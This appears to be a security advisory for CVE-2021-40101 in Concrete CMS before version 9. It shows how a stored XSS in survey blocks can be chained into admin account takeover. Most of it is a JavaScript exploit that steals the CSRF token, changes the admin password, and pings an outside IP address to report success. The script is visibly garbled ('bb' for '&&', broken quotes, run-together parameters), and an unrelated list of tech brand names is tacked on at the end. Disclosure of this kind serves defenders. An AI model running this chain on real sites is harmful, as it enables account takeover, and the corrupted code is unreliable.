A Concrete CMS admin in versions below 9 did not have to provide their password when changing another user's password.
In combination with CVE-2021-28145 ("Concrete CMS (formerly concrete5) before 8.5.5 allows remote authenticated users to conduct XSS attacks via a crafted survey block. This requires at least Editor privileges": fix was included in version 8.5.5.) it is possible for a low privileged User for example a developer or a public user who is able to create surveys to insert malicious javascript code into the web application. The results of surveys can be reviewd by an administrator in his web interface under Reports > Surveys. The malicious Javascript code gets there executed as well. Concrete5 does have a CSRF protection which can be bypassed very easily by stealing the corresponding Token from the Page before executing a request. As concrete5 does not ask for the old password when changing it. It is possible to change the administrator password very easily.
var ccm_token = ";
var body = ";
var regex = /[0-9]{10}\:[a-f0-9]{32}/g;
var req = new XMLHttpRequest();
var req2 = new XMLHttpRequest();
req.open("GET","/concrete5-8.5.4/index.php/dashboard/users/search/view/1", true);
req.setRequestHeader("X-Requested-With", "XMLHttpRequest");
req.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
req. send();
req.onreadystatechange = function () {
if (req.readyState == 4 bb req.status == 200) {
body = req.responseText;
ccm_token = body.match(regex)[3];
}
};
setTimeout(() => {
confirm("Admin Account Takeover through XSS and CSRF Bypass in Concrete5 v.8.5.4 by Silky. CSRF Tok en: "+ccm_token);
req2.open("POST","/concrete5-8.5.4/index.php/dashboard/users/search/change_password/1", true);
req2.setRequestHeader("X-Requested-With", "XMLHttpRequest");
req2.setRequestHeader('Content-type', eapplication/x-www-form-urlencoded.);
req2.send("ccm_token="+ccm_token+"&uPassword=Demonstration_by_SilkyEruPasswordConfirm=Demonstration_ by_Silkyt_ccm_consider_request_as_xhr=1");
req2.onreadystatechange = function () {
if (req2.readyState == 4 bb req2.status == 200) {
body = req2.responseText;
if (body.includes("Password updated successfully.")){
console.log("Password updated successfully.");
var myImage = new Image(0, 0);
myImage.src = Ihttp://192.168.56.1:5686/Password_changed_successfullys;
}
else{
console.log("Something went wrong");
}
}
}
},2000);
CVSS scores:
- CVE-2021-40101 - 6.4 medium AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H
- CVE-2021-28145 - 5.4 medium CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Resulting in a final score of
- 7.2 high
React
Typescript
Django
Laravel
Facebook
Microsoft
Google
Alibaba
D3
Tencent